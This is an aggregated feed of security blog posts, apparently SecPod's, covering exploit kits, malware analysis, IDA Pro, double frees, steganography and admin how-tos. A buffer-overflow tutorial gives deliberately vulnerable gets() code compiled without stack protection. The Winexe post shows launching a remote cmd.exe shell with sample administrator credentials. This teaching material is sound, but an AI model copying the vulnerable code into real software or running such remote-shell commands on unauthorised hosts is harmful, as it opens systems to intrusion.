OpenVAS

January 02, 2014

SecPod Research Blog

Exploit Kits: Cybercriminals ultimate weapon


Exploit kits are automated malicious software programs which target client side application vulnerabilities like Web Browsers, Add-ons, Adobe Flash Player, Adobe Reader, Java Runtime Environment etc.

Exploit kits are easy to use and does not require in-depth technical knowledge. Hence it can be used by inexperienced hackers as well. Cybercriminals sell exploit as a service and it can be rented for a day, week, month or a year according to the need and they are easily affordable.

Exploit Kit Capabilities

Exploit Kit Capabilities


Exploit kits have several capabilities to create Botnet Command & Control (C&C), Fake Anti-virus, Malware installers, Trojans, Spyware. Few exploit kits provides nice and user friendly web interface with powerful control panel where attackers can configure according to their attack plan.

Exploit kits are very sophisticated and they can bypass detection mechanism from security products by changing evasion and obfuscation techniques.

How exploit kits work in general:
First attackers exploit server side vulnerabilities and add malicious hidden iframe in legitimate website. Then, attackers convince users to visit a compromised websites. Once the victim visits the site, the page gets redirected to exploit kit hosted on Bulletproof site. Bulletproof hosting is a service provided by domain/web hosting providers, which allows their customers to upload anything, including malicious content. Exploit kits collect various information such as browser version and installed add-ons, Adobe Flash, Adobe Reader, JRE version and so on. Based on the collected information, they determine and deliver exploit/malicious code by taking advantage of vulnerable software. If exploit succeeds, then it can download and installs Malware, Trojans, Spywares etc.

Exploit Kit Working

Exploit Kit Working


The Cybercriminals blacklist IP addresses to keep researchers and security vendors away from analyzing the exploits/attacks. If a victim visits malicious website, the victim’s IP address is checked in the back-end database server. If it’s already exists in the DB, then exploit kit will respond differently. If IP address does not exists in the DB, then exploit kit will allow access. Few of the exploit kits get the black listed IP address as an update.

Some popular exploit kits are,
- Blackhole
- RedKit
- Neutrino
- Magnitude
- Phoenix
- CRIMEPACK
- Whitehole
- Cool Pack
- Crime Pack
- Neo Sploit
- Nuclear

Exploit kits mainly take advantage of vulnerable software to get into the system. Best way to stay safe is to install applications/add-ons only from authors whom you trust and keep your browsers and other applications up-to date to avoid attacks. Never click on emails from unknown source and avoid suspicious websites.

Download Saner and keep your systems updated and secure.

- Veerendra GG

by Veerendra GG at January 02, 2014 11:25 AM

December 27, 2013

SecPod Research Blog

Anti-virus is dead?

Anti-virus or Anti-malware is not dead; it is one of the defense mechanism in a defense-in-depth strategy.

“Anti-virus is dead” is what you generally hear these days from the ‘over-the-top’ campaign makers. And what is the alternative, if so? There has never been a suitable response. Anti-virus or anti-malware products do their job quiet well, what they were meant for. You generally get asked, “Which AV is better?” There are testing companies, there are surveys available etc. to prove one against the other. Majority of these AV products do much of the same job. And each of them is as effective as the other.

So, is Anti-virus enough to safeguard your systems? Anti-virus is like going to a doctor after you are infected. Doctors will suspect some kind of an infection and may suggest some cure. And you get repeatedly attacked by different variants and you keep visiting your Doctor. There are anti-body identification mechanisms built into the human immune system, which identifies foreign bodies and fights with them. So, there are computer firewalls, signature based malware detection, malware heuristics and behavioral analysis methods which try their best to emulate human system but they are nowhere closer to the sophistication of human defensive mechanism.

It is reported that about 67% of malware are undetected and about 90% of the malware make use of a vulnerability or misconfiguration in your system. Attackers today have methods to automate the creation of malware, be polymorphic and stay undetected. Attackers have the automated environment to test the detection rate of AV products and fine tune their malware.

Anti-virus alone is not enough; the need is multi-level defenses in order to effectively safeguard your system, be it a home computer or a business computer. As an industry, we went wrong with relying only on ‘detect-and-cure’ method.

1. Strengthen the system by fixing vulnerabilities or loopholes and misconfigurations: Stay healthy, stay secure. Majority of the malware today are making use of loopholes, default or misconfigurations in the system to get into the system.
2. A firewall to filter out the unwanted traffic: Open the door to the traffic of your interest.
3. Anti-malware: Product that works based on software reputation or white labeling of all the executables and performs behavioral analysis of each event that take place in the system.
4. Know what is running in your system and monitor regularly.

Building immunity is the first line of defense. Keep your software updated and configure them appropriately.

by Chandra at December 27, 2013 06:17 PM

December 23, 2013

SecPod Research Blog

Dissecting stack based buffer overflow

what is a buffer?

In general, the term buffer is a temporary storage, a space in the memory used to store the data.

Memory Organization:

Memory Allocation

Memory Allocation

Stack: Contains arguments which are passed to the function and local variables.
Heap: Contains the dynamically allocated memory (malloc()).
Data:
– Initialized data segment: Contains the global, static and constant data.
– Uninitialized data segment (BSS): Contains uninitialized data.
Code or Text : Contains actual executable code or executable instructions.

More on Stack:

Stack is LIFO data structure, that is Last in First Out. Anything which is put into the stack last is the first which will have to be removed. Stack always grows down the memory address, from higher to lower and ESP points to the top of the stack.

Stack grow down

Stack grow down

Stack supports two operations:

PUSH:  Pushing data into the stack. (After push fix ESP to top of the stack)
POP: Remove the data from the stack.(After remove fix ESP to top of the stack)

What is buffer overflow?

Buffer overflow occurs when the larger data is written to the buffer without checking the actual size of the buffer. It is due to an improper bound checking and results in overwriting the adjacent memory locations.

Stack overflow :
- Overwriting a local variable.
- Overwriting the return address.
- Overwriting a function pointer.
- Overwriting a parameter of a different stack frame or a non local address.

Heap overflow :
Generally, heap overflow will happen in the heap area when allocating the memory dynamically using runtime memory allocation techniques.

More on Stack Based overflow:

Let’s consider some sample code which is vulnerable to stack based overflow.

#include<stdio.h>

Input()
{
char buf[8];

gets(buf);    /*gets() itself is dangerous function because  it does not do the bound check.*/
puts(buf);

}

main()
{
Input();

return 0;
}

In the above code gets(); is used which is going to get input from the user and writes into the variable ‘buf’ without checking the size of the variable ‘buf’.  Suppose, if user supplies more than 8 bytes of data and gets() will still happily go ahead and write that onto the memory.

Run the Program :
Lets go ahead and run the the program with normal size of the buffer.

Normal execution of the program

Normal execution of the program

Here, we had given the input string “SecPod” which is less than the size of the buffer, so the program will print the string “SecPod” and exits normally.

Now, go ahead run the program with large data input.

Abnormal execution of the program

Abnormal execution of the program

Observe that the given string is “SecPod SecPod”, which is more than the size of the buffer available. So when executed, the program will throw “Segmentation fault (core dumped)”.

Let’s analyse the source code to understand further.

Vulnerable program stack layout:

Vulnerable program stack layout

Vulnerable program stack layout

Observations:
- Input() functions is not taking any argument, thus there are no arguments which are pushed into the stack.
- When main() program transfers control to the input() function, it will push the next instruction ie ‘return 0′ on to the stack.
- Once the execution goes to the input(), old value of the EBP will be stored and then local variables will be pushed into the stack.
- 8 bytes of buf variable is stored in the stack and 4 bytes of the old EBP is stored.

Now lets try it wirh GDB to get a better understanding.

Run the program with GDB: 

run with gdb

-  Compile the program with gdb.
# gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -o stack_bof.o stack_bof.c
-  Run the  program with gdb.
# gdb ./stack_bof.o
- List the source code in gdb.
- (gdb) list
-  Set the the two break points , first one at line 13 and second one at line 7
-  (gdb) break 13
Breakpoint 1 at 0×8048425: file stack_bof.c, line 13.
(gdb) break 7
Breakpoint 2 at 0x804840a: file stack_bof.c, line 7.
(gdb)

Disassembled code:

dissassemble the code

disassemble the code

Stack observation:

Stack observetion

Stack observetion

Overwritten return address:

return address is overwritten with input string

return address is overwritten with input string

Execute some crafted code:

Let’s slightly modify the original program code by adding a new function called shouldNotExecute() and compile the program again and run.

#include<stdio.h>

shouldNotExecute()
{

printf(“should not execute\n”);

}

Input()
{
char buf[8];

gets(buf); /*gets() itself is dangerous function because it does not do the bound check.*/
puts(buf);
}

main()
{
Input();
return 0;
}

Run the above program
# gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -o stack_bof.o stack_bof.c

Load into the gdb at get the address of the function shouldNotExecute()
# gdb ./stack_bof.o

Execution of shouldNotExecute() function

Execution of shouldNotExecute() function

Notice that shouldNotExecute() function is not called from anywhere. With special crafted inputs it is possible to execute the shouldNotExecute().

-AnTu

by Antu at December 23, 2013 11:34 AM

December 17, 2013

SecPod Research Blog

Advanced Power Botnet: Innovative Approach to find Security Vulnerabilities


A new kind of botnet has been uncovered which takes innovative approach to find security vulnerabilities in the website using systems installed with illegitimate Mozilla Firefox add-on. An investigation by KrebsOnSecurity has revealed.


The “Advanced Power” botnet has already infected more than 12,500 systems. It
installs itself as a legitimate Mozilla Firefox add-on/extension and helped cyber-criminals to identify SQL injection vulnerabilities in 1,800 websites.


Once malware gets into the system, it installs a Mozilla Firefox bogus “Microsoft .NET Framework Assistant” add-on. It is a malicious add-on which has same name as of legitimate add-on tricking user to install. The malicious add-on then searches for all the pages visited by the victim for SQL injection vulnerabilities.


The botnet has been first spotted in 31st May 2013 according to malware analysis service Malwr
SHA256 19b523e0db7d612dd439147956589b0c7fe264f1eb183ea3a74565ad20d3cb8a
and at that time only 3 antivirus applications out of 47 (as shown in below picture) were able to identify this as malicious code according to Virus Total, which is very low detection rate.

virus-total-so-exe


Advanced Power malware has been distributed at least in part by the Blackhole exploit kit according to “Kafeine” @ Malware Don’t Need Coffee blog.


Mozilla has blocked bogus “Microsoft .NET Framework Assistant (malware)” add-on used by the Advanced Power botnet.

add-on-install-block

mozilla-blocks-bogus-addon


Attackers are using very deep and innovative approaches to bypass various defensive techniques. Antivirus alone is not enough to protect against these attacks. Install applications/add-ons only from authors whom you trust and keep your browsers up-to date to avoid attacks. Download Saner and keep your systems updated and secure.


- Veerendra GG

by Veerendra GG at December 17, 2013 02:01 PM

December 05, 2013

SecPod Research Blog

The Saner Journey – some random moments

It took us close to nine months to translate our idea into reality. We had debated the idea (for ANCOR, Saner and other products we plan to build) for over three months.
Dropping some features, adding something in the last minute, debates, disagreement, agreement, sleepless nights, real-deep technology discussion, theoretical Computer Science discussion, this make sense, that doesn’t make sense, support of the family members, tension, humor, silence, over engineering, fun, passion, satisfaction, I am sure I have missed out to mention many more emotions here but that was, in general, the journey.
The first step was to prepare an architecture diagram. We put it up in the Centre of our office, where we keep seeing it each day and say, ‘it is just about making this work’. Just seeing that printed poster of the architecture has given us joy. It was put up on the outside of the glass pane of my cabin, so I always saw the other side. Was it intentional?
I thoroughly enjoyed the breakfast meetings where each one had to present ideas, debate on those ideas. One, it is fun to eat and discuss and second, things really get done in the morning hours.
In the first session when I was presenting the idea to the team, we set a goal to finish the scan in just one minute. On an average, security scanners take about 10-15 mins to do anything meaningful. We knew it was an over optimistic goal. When we did the prototype it took about 5 mins and after tweaking it more, it came down to sub 4 minutes. Was one minute some kind of reality distortion? Maybe not… We have not given up on that!
During the initial days, we thought of a feature which we all agreed was really cool to build. It was about making use of the system resources when the system is idle or when the system is underutilized to scan, so that users don’t feel that the scan is taking away productive time. We discussed this passionately and came out with multiple approaches to find out the usage pattern of the system and arrive at a decision point to perform the scan. We spent a good amount of time prototyping it. But, it was really funny when we found out that Windows already had an API to do just that. Our admiration for the Windows operating system grew, but, we had already spent enough time on it. In the end, we called off the feature because the scan speed was very good and there was no need to find out the optimal time to scan. The user can now scan whenever s/he wants to.
It is August 14th, there is a bug, UI is crashing for no reason, working late evening with the Developer to get that fixed. Tomorrow we have to make a build for the QA. Of course we have tried all possible ways to understand what is going wrong, the backend the front end etc. Frustration is when you do not know what the problem is, solving is the easiest part. We found one function call which was responsible and commented that out which was not needed. It was 12 AM then and I say, “Happy Independence Day!” Tracing back the problem, connecting the dots is fun and it is intellectual high!
There are a few occasions when I have given up on something and I would say, ‘I am ok with it’. But real satisfaction is when the developer is not satisfied with that statement and they go all out and ensure things are built to perfection. Nothing is more satisfying than the whole company working with a single purpose in mind and when everyone takes the role of perfectionist.
I have heard some seemingly strange discussions too, ‘if I put a bracket this side, CPU utilization will be more’, ‘we need to reduce the number of steps in this algorithm’, ‘while() loop, why not an event based listener?’, and many more that brightened up my knowledge on theoretical computer science.
Ideas kept coming till the last days when we had made up our mind for the release. And I have said ‘I don’t want any revolutionary idea now’ to stop them creeping in at the end moment.
We were sitting on a huge pile of vulnerability research content created for over 5 years, the team that relentlessly do the research, create content or signatures and provide solution to those on a daily basis. That made the job easy for us.
The videos, website, user guide, FAQ was all done by Developers. That is certainly not a norm in the industry. I was coming up with strange ideas for the video, when one of the Developers realized that it was going to be a disaster and took up the job of creating an awesome video for the product.
Setting goals is easy; translating those into reality is not. Without the effort of the immensely talented, passionate young Engineers, this would have remained a dream. There has been sincere engineering effort, personal sacrifices, late nights, fun, humor and satisfying moments. Hope people who use it find it beneficial.

by Chandra at December 05, 2013 11:04 AM

November 19, 2013

SecPod Research Blog

Introduction to IDA Pro

IDA Pro is primarily a multi-platform, multi-processor dis-assembler that translates machine executable code into assembly language source code for purpose of debugging and reverse engineering. It can be used as a local or as a remote debugger on various platforms. Plug-ins can be developed and supports a variety of executable formats for different processors and operating systems.

Here is the screenshot of the IDA Pro Desktop:

IDA desktop

1) The toolbar area is the space below menu bar where the tools can be docked.

2) Navigation band is the horizontal color band below the toolbar area which can be used to jump to particular code region of the executable under analysis. It represents the address space of the executable. Light blue stands for library code, red is compiler-generated code and dark blue is user-written code. Code analysis is usually done in the user-written code region.

3) Dis-assembly window is the primary window showing the assembly level code of executable under analysis. This window is available in two formats: graph mode (as shown above in figure) and text mode. Graph mode view represents program control flow. In graph mode the executable is broken into blocks of functions with colored arrows showing control flow between the function blocks. If arrow is red, a conditional jump is not taken. If it is green then jump is taken, and if color is blue an unconditional jump is taken. On the other hand, the text mode presents the entire dis-assembled code of the executable under analysis. Here in text mode an arrow facing up indicates a loop, the unconditional jump is indicated by solid lines and conditional jumps are shown as dashed lines.

4) Functions window shows all the functions in the executable. This window can be used to differentiate the functions based on the length as well as type. It uses flags like F, L, S, and so on, to indicates function type.

5) Names window shows functions, named data, named code, and strings address with a color and letter coded name.

      I indicates an imported name,
      F indicates a regular function,
      L indicates a library function,
      D indicates named data locations,
      A indicates ASCII string data location and
      C indicates named code that is memory location,

6) Strings window shows ASCII strings within the executable.

7) Imports window lists all functions that are imported by the file under analysis.

8) Exports window shows all the functions and variables that the file under analysis exports to be used by other files.

9) Message window is the status window which displays the output generated by IDA Pro which may be error messages or status of on going analysis.

Some useful IDA pro plug-ins are :

1) AsPack/ASPR: A plug-in that can be used to un-pack or de-compress files compressed using Win32 file compressor.

2) Hex-Rays Decompiler: A plug-in that translates an object file into a compatible source file.

3) Stealth: An open-source anti-debugger plug-in which tries to hide the IDA Pro from most common anti-debugging techniques.

4) PatchDiff2: An open-source plug-in that can be used to compare two IDA Pro database (IDB) files and find the differences between both.

5) IDAPython: An open-source plug-in that combines the Python programming language with IDA Pro and thus allows scripts to run in IDA Pro.

6) Ida struct: An open-source plug-in which helps in recognizing high-level objects and structures in binary code.

7) EPF – Entry-Point-Finder: A plug-in which can be used to get original entry point of a packed or crypt-ed windows PE executable.

 

- Shakeel

by Shakeel Bhat at November 19, 2013 01:29 PM

October 31, 2013

SecPod Research Blog

Steganography

Steganography is an art of hiding a message, image, or file within another message, image, or file.

Mostly images are used to hide the data. The flexibility of using images means that information can be hidden in a variety of ways. It can be scattered all over the image or inserted straight inside.

If data is inserted straight inside. we can find it easily using the below technique,

    - Open that image with any Hex Editor (like HexEdit, HxD on windows) or use vim with hex mode.
    (using :%!xxd command on Linux).
    - An image starts with “FF D8” two bytes and ends with EOI (End Of Image) marker “FF D9“.
    - If any data is inserted straight in to an image you can see your data after the EOI (End Of Image) marker.

Here is an example to insert data straight inside the image without any tool on windows:

  1. Create a test file with some data to hide. ( Here i used “hidden data.txt” )
  2. Take an image to which you need to hide. ( Here i used “original.jpg” )
  3. In Command prompt use the below command to hide the content.
  4. copy /b original.jpg + "hidden data.txt" "hidden image.jpg"

windows-copy-cmd

A new image will be created with your data hidden. You can open and view that image normally.

But, to view the hidden content open that image in any Hex editor as mentioned above and see the hidden data at the end after the EOI marker.

Hex view

Later, a quick obfuscation layer is added (Password or key) to hide the visibility of the data in the HEX format. To view the original message we need that key or password.

Here is an example to insert data inside the image using Outguess tool:
outguess is one of the tool that allows the insertion of hidden information into
the redundant bits of data sources.

Data Hiding : outguess -k "secretkey" -d hidden.txt image.jpg out.jpg

    - hidden.txt – Contains text or data to hide
    - image.jpg – Image used to hide data
    - out.jpg – Output Image with Hidden data

outguess-hide

Data Retrieval : outguess -k "secretkey" -r out.jpg hidden.txt


Data-Retrive

 
- Thanga Prakash

by Thanga Prakash at October 31, 2013 05:31 AM

How to Install Windows Softwares on Linux

There are times when we need to run some Windows applications (.exe, .msi) on Linux.
This objective can be achieved with the help of wine.

What is Wine?

Wine is a free, open source software, wihch allows to run Windows applications on Linux. Wine
provides a software library(Winelib) against which users can install and run Windows applications.

Installing Wine on Linux (Ubuntu 12.10)

If you prefer to install Wine on Linux (Ubuntu 12.10) with packages, check system’s package manager.

In Ubuntu, Open the “Ubuntu Software Center” Search for the “Wine” and Select the it from the list and click on ‘install’,

Screenshot from 2013-10-31 11:37:29

It will install the wine and its related dependencies for you.

If you prefer to install packages from the command line, follow the below steps,

Run the following command and it will install the latest version of Wine in Ubuntu,

Install Wine in Ubuntu

Confirm the installation by running the wine command,

Screenshot from 2013-10-31 11:45:17

Installing Wine using Source Code

Download the latest source code from http://www.winehq.org/download/

tar -xf file.tar.bz2
cd dir_name
./configure
make
sudo make install

NOTE: "make install" needs to be run as root or "sudo make install".

INSTALL/README file that'll explain the wine specifics for compiling.
Configure the Wine

Run ‘winecfg’ to configure the Wine and you can select the Windows versions.

$ wine winecfg

Screenshot from 2013-10-31 11:52:00

Installing Windows Software with Wine

To install, just run the command wine with installer.exe

$ wine “Firefox Setup 12.0.exe”

Screenshot from 2013-10-31 12:18:36

Now follow the installation steps as you do in Windows,

Default the application will be installed in “:~/.wine/drive_c/Program Files/”

Running Installed applications:

Locate the installed path and run the file with Wine,

:~/.wine/drive_c/Program Files/Mozilla Firefox# wine firefox.exe

Screenshot from 2013-10-31 12:26:45

Now your Browser is ready to use.

Screenshot from 2013-10-31 12:29:17

 
- Antu

by Antu at October 31, 2013 05:26 AM

October 30, 2013

SecPod Research Blog

Double Free Vulnerability Basics Explained

One of the most common memory corruption error usually found in an application is “Double Free” error. Double free error is caused by freeing same memory location twice by calling free() on the same allocated memory. Below is a sample “Double Free” error code,

char* Y = (char*)malloc(20);

…….

If (X)

{

free(Y);

}

……..

free(Y)

It becomes too complex to find such errors in a bunch of files in an application.

 

How memory is allocated ….???

Consider an application which makes a request to the OS (Operating System) for some amount of memory to be allocated. Usually OS projects to the application as if the requested block of memory is one chunk of memory block, but actually the memory will be segregated in different places. OS usually maintains 2 pointers for each memory locations, 1st pointer will be having location details of the previous free memory and the 2nd pointer will be having location details to the next free memory location. When you “free()” memory locations,

free(X)

free(Y)

Consider “A” and “B” points to the two pointers of “X” memory location and “C” and “D” points to the two pointers of “Y” memory location.

A —-> 1st pointer of freed “X” memory block holds the previous random memory location

B —-> 2nd pointer of freed “X” memory block holds “y” freed memory location (“Y” memory location is next to “X” memory location)

C —-> 1st pointer of freed “Y” will hold “X” freed memory location (“X” memory location is previous to “Y” memory location)

D —-> 2nd pointer of freed “Y” will holds the next random memory location

It’s similar to Doubly-linked list.

Here “A” will be holding previous free random memory location, “B” will be holding “Y” memory location and “C” will be holding “X” memory location and “D” will be holding next free random memory location.

 

What causes a Double Free Vulnerability ….???

To trigger a double Free Vulnerability, same memory location should be freed (“free()”) twice. Have a look at the first sample code, variable “Y” is freed twice

free(Y)     # freed first time

free(Y)     # freed again second time

When same memory allocated variable is freed twice, then multiple memory location pointers will be pointing to the same freed memory location.

Later, if new memory is allocated to “Z”, there will be an undesirable condition which may lead to memory corruption.

char* Z = (char*)malloc(20);

 

How to avoid Double Free error while coding …?

One of the ways to avoid Double Free error in the code is by assigning the pointer to null after it’s been freed once.

char* Y = (char*)malloc(20);

…….

If (X)

{

free(Y);

Y = NULL;

}

……..

free(Y) # It’s nothing but free(NULL)

free(NULL) will be a dead code which particularly does nothing.

To detect this kind of memory corruption errors Open-Source tools like Valgrind or GNU Project debugger are very much handy which helps to analyze code in a better way.

 
- Shashi Kiran

by Shashi Kiran at October 30, 2013 01:51 PM

Basic Malware Analysis

Any program that is intended to disrupt computer or network operation, gather sensitive information, gain access to private computer systems or networks is malware. Virus, Spyware, Worm, Adware, Trojan horse, Rootkit, Scareware are all examples of malware. Malware analysis is an art of dissecting the malware in order to understand how it works, and how to defeat or eliminate it.

There are two fundamental approaches to malware analysis:-

- Static analysis, which involves examining and analysing the malware without executing it.

- Dynamic analysis, which involves executing the malware on the system and analyzing it.

Static Analysis approach:

  1. A very first step to malware analysis is to run malware through multiple antivirus programs, which may already have identified it. It can save us from lot of time and work.A free online service that analyzes files enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by various antivirus engines and website scanners is available at https://www.virustotal.com
  2. Next, Hashing technique is used to uniquely identify a malware. The malicious software is run through a hashing program that produces a unique hash that identifies that malware. Searching for that hash online to see if the file has already been identified or not, can again save us from lot of effort. One of online malware hash DB may be found at https://isc.sans.edu/tools/hashsearch.html

    MD5 Calculation

    MD5 Calculation

  3. Use any Strings program like BinText or Strings to display all the strings within executable. A program contains strings if it prints a message, connects to a URL, or copies a file to a specific location. These strings can give us an idea of working of executable. However if the executable is packed or obfuscated, no useful strings can be seen. In that case dynamic analysis is the option.

    Bin Text in action

    Bin Text in action

  4. Check the dynamically linked list in the executable with any of the tools available. The libraries used and functions calls are often the most important parts of a program, and identifying them is particularly important, because it allows us to guess at what the program does. Dependency walker is one of the commonly used tools which lists all dependent modules within executable.

    Dependency Walker listing dependent modules

    Dependency Walker listing dependent modules

  5. Finally the most important and useful static malware analysis technique, disassembling of executable can be used with any of the available assembly level disassembler like IDA Pro. IDA Pro is a multi-platform assembly level disassembler that translate machine executable code into assembly language source code. It can be used to run in either text mode or graph mode. Text mode simply arranges source code into assembly level code, while as in graph mode code is divided into blocks and arranged according to the logic program uses while executing, highlighting jumps and branches. Other useful windows IDA Pro provides include Functions window, Strings window, Names window, Exports window, Imports window, Structures window.

    IDA Pro

    IDA Pro

Dynamic Analysis approach:

  1. Check for the the File system and process activity using procmon or proc explorer or any other available tool. Procmon monitors all system calls it can gather as soon as it is run while as Process Explorer monitors the processes running on a system and shows them in a tree structure that displays child and parent relationships.

    Process Monitor

    Process Monitor

  2. Determine the recent Registry activities, which keys have been added or deleted recently. Regshot is a good tool for this purpose. Regshot provides comparison of registry entries before and after running executable.

    Regshot Snapshot

    Regshot Snapshot

  3. Monitor for Network activity using apate DNS, or wireshark. Apate DNS can be used to check the DNS requests made by malware while as wireshark can be used for packet sniffing.

    Wireshark Preview

    Wireshark Preview

  4. Test or examine the execution of malware by means of any low level debugger like Ollydbg or Windbg. A debugger is a program that is used to test or examine the execution of another program. Low level debugger traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries. It also provides the function to pause the execution of program under test and check its state. Below is snapshot of Olly in action.

    Olly Debugger

    Olly Debugger

 

 
- Shakeel

by Shakeel Bhat at October 30, 2013 01:49 PM

October 28, 2013

SecPod Research Blog

Hack VMware Remote Console (Firefox add-on) to Run Independently !!!

In firefox version 3.6 or higher, VMware Remote Console Plug-in will not load properly. To open VMWare Remote Console, there is a small hack were we can load VMware Remote Console independently without running older version of firefox.

Skip to step 5 if VMware Server and VMware Remote Console Plug-in are already installed.

1) Install the VMware Server 2.x

2) Access VMware Web Access Management
http://localhost:8222 OR https://localhost:8333

3) When we try to access console tab it complains saying “The VMware Remote Console Plug-in is not installed or could not be found.”

4) Click on “Install plug-in” to install the VMware Remote Console Plug-in as a firefox add-on.

5) Now we can find VMware Remote Console Plug-in inside “.mozilla” in your home directory under “extensions” folder. Below command will give the path of VMware Remote Console Plug-in
user@ubuntu# cd ~/.mozilla && find . -iname VMwareVMRC@vmware.com

6) Copy VMware Remote Console Plug-in directory to your chosen path.
user@ubuntu# cp -r ./firefox/acdnde.default/extensions/VMwareVMRC@vmware.com ~/vmware-console

7) Change directiory “~/vmware-console/plugins/” and assign execute permission to “vmware-vmrc”. Execute “./vmware-vmrc” to get the VMware Remote Console Window.
user@ubuntu# cd ~/vmware-console/plugins/
user@ubuntu# chmod +x vmware-vmrc”
user@ubuntu# ./vmware-vmrc

VMware Remote Console appears as show below

NOTE: If it is not showing the below “VMware Remote Console” Window, Set “VMWARE_USE_SHIPPED_GTK” variable to “yes”
user@ubuntu# export VMWARE_USE_SHIPPED_GTK=yes

8) Connect to server by giving VMware server IP address with port 8333 and credentials as shown below.

vmware-console-01

9) If authentication is successful, it will list available “Virtual Images” in the VMware Server as show below,

vmware-console-02

10) Select the virtual image which we want to access.

Alternatively, we can extract the plugin from VMware Server installation located @
“/usr/lib/vmware/webAccess/tomcat/apache-tomcat-6.0.16/webapps/ui/plugin/vmware-vmrc-linux-x86.xpi” and “unzip vmware-vmrc-linux-x86.xpi”

Repeat the same procedure from step 6.

This way we can run VMware Remote Console independently without installing old firefox to get VMware Remote Console.

Cheers!!!
Veerendra GG

by Veerendra GG at October 28, 2013 05:50 PM

June 21, 2013

SecPod Research Blog

Run commands on Windows system remotely using Winexe

Winexe is a GNU/Linux based application that allows users to execute commands remotely on WindowsNT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command and uninstalls the service. Winexe allows execution of most of the windows shell commands.

How to install:
You can download the source package from here [Current version is winexe-1.00.tar.gz]

  1. tar -xvf winexe-1.00.tar.gz
  2. cd winexe-1.00/source4/
  3. ./autogen.sh
  4. ./configure
  5. make basics bin/winexe

this will create a [ winexe ] binary file in the bin folder. You can use that binary to execute the windows commands from Linux.

or else there are some compiled version of binary itself available for download. You can download and use it from here.

How to use it:

  • ./winexe -U [Domain/]User%Password //host command

Examples:

  • ./winexe -U HOME/Administrator%Pass123 //192.168.0.1 “netstat -a”
  • ./winexe -U HOME/Administrator%Pass123 //192.168.0.1 “ipconfig -all”
  • /winexe -U HOME/Administrator%Pass123 //192.168.0.1 “ping localhost”

To launch a windows shell from inside your Linux box. Using this below command,

/winexe -U HOME/Administrator%Pass123 //192.168.0.1 “cmd.exe”

winexe command execution

Winexe Binarycd winexe-1.00/source4/

by Thanga Prakash at June 21, 2013 02:13 PM

June 15, 2013

SecPod Research Blog

Security is a process

There is no “magic box” security. I can’t buy a device in the market that can be plugged in somewhere and assume “I am safe”. Much like dreaming about an all-proof balloon that secures us from all diseases and attacks. There is no replacement for a healthy-diet program and being vigilant. It is the process of eating healthy, keeping yourself fit, getting adequate sleep, which builds our immunity. And being vigilant of the possible loopholes and fixing them in advance. On top of that, you add peep-through hole, burglar alarm, underground bunker, a bullet proof car or jacket or whatever else you think is necessary depending on your social status. If you are still attacked, you either go to the Doctor or Police. This entire thing is a “Process”.

Securing our computer systems, we buy a Firewall, set it up at the perimeter or at the endpoint and assume that our assets are secure. We forget the fact that firewalls need to allow traffic of our interest and that traffic might contain malicious code. And then we go for Antivirus. This is to help clean an infection after you are already attacked. And sometimes, we go for NIPS (Network Intrusion Prevention System), HIPS (Host Intrusion Prevention System), which is the balloon analogy. There is no fool-proof system that blocks all targeted attacks. All these are essential additional attachments depending on the social status (worth) of our assets. What we miss is a healthy-diet program. That is Vulnerability Management. Managing vulnerabilities is identifying the loopholes, fixing those weaknesses regularly and keeping your computer system healthy, which means security hardening your system and applying patches regularly. This entire thing, including the additional attachments, is a “Process”.

by Chandra at June 15, 2013 08:47 AM

June 06, 2013

SecPod Research Blog

SecPod produces security advisories in CVRF format

SecPod intends to publish security advisories in an XML format that conforms
to Common Vulnerability Reporting Format (CVRF version 1.1).

What is CVRF?
The Common Vulnerability Reporting Framework is an XML-based standard that
enables sharing of vulnerability information in a machine-readable format.
Originally derived from the Internet Engineering Task Force (IETF) draft Incident
Object Description Exchange Format (IODEF), this format was then developed by
the Industry Consortium for Advancement of Security on the Internet (ICASI).

CVRF Provides Two Key Benefits:
(1) It provides a consistent way to depict security information thus simplifying
the interpretation of the advisories, and
(2) It provides a machine-readable format for the interpretation of security
advisories, thus allowing automation (and integration of the advisories in,
for example, vulnerability scanning tools).

More can be found here:
http://www.icasi.org/cvrf

One of our advisory in CVRF format:
Advantech WebAccess HMI/SCADA Software Persistence Cross-Site Scripting Vulnerability.

by Antu at June 06, 2013 11:17 AM

May 29, 2013

SecPod Research Blog

Attacks are real, it would be naïve to think otherwise

All human beings have a part of the good and the bad. At times, bad takes over the good and other times, good takes over the bad. The fight between the good and the bad is not new.

Attacks do happen and can happen to anyone, anytime, sometimes with notice and mostly without notice. In major part of the civilized physical world, people live in peace mostly. We have been able to contain the bad to a greater extent and the world is seemingly peaceful at large. But, there again, thefts happen, raids happen, conflicts happen, accidents happen, killings happen, underworld exists.

In the digital world, where you cannot visualize the image of an attacker, where the traces of the attacker are hard to characterize, where everything is virtual, it becomes harder to bring order. It is easier for attackers of all forms (humans and bots) to exhibit their skills more freely. Just as you thought your introvert friend is so extrovert online.

In order for this writing to remain relevant, I would ask you to Google, ‘recent malware attacks’ and I am sure you hit a million results. There are number of software applications and operating systems having vulnerabilities, there are spams and phishing attacks, there are sophisticated attacks (advanced persistent threats), attacks on the mobile devices, large banks are attacked, major news agencies are attacked, Government establishments are attacked, and technology companies are attacked. Who is safe?

Attacks are real; it would be naïve to think otherwise.

Each one of us has experienced an attack of some kind or many kinds at some point or at multiple points. If you haven’t been one of the victim, you probably didn’t realize your data was stolen or probably didn’t realize your system was used in one such attack or you have been plain lucky.

So, what do attackers target?

It is mostly your data and information, your credit card, online bank account details, financial transactions, your identity profile, your health records, your company data, your business strategy, your productive hours. And there are sophisticated, well-funded, organized attackers who target countries, defense establishments, water and energy supply, nuclear establishments, manufacturing units, satellites. And there are others who mostly take out your peace.

As much as we embrace this digital world, we need to be prepared to deal with its adversaries too.

by Chandra at May 29, 2013 09:40 AM

May 24, 2013

SecPod Research Blog

What are we doing wrong in safeguarding our computer systems?

1. Naïve Belief: Who is interested in my system? Nobody is going to attack me. I haven’t done anything bad to anyone, so why will they?

2. Believing Security can be bought: that magic device that I bought will take care of everything.

3. Trusting Anti-virus is enough to safeguard the system: Feel safe once installed.

4. Cleaning instead of prevention: Trying to clean the malware after it has already infected instead of putting in all the measures that could have avoided the malware infection itself.

5. Ignore proactive security measures:Not proactively assessing the security posture of the system in order to fix the loopholes and strengthening the system.

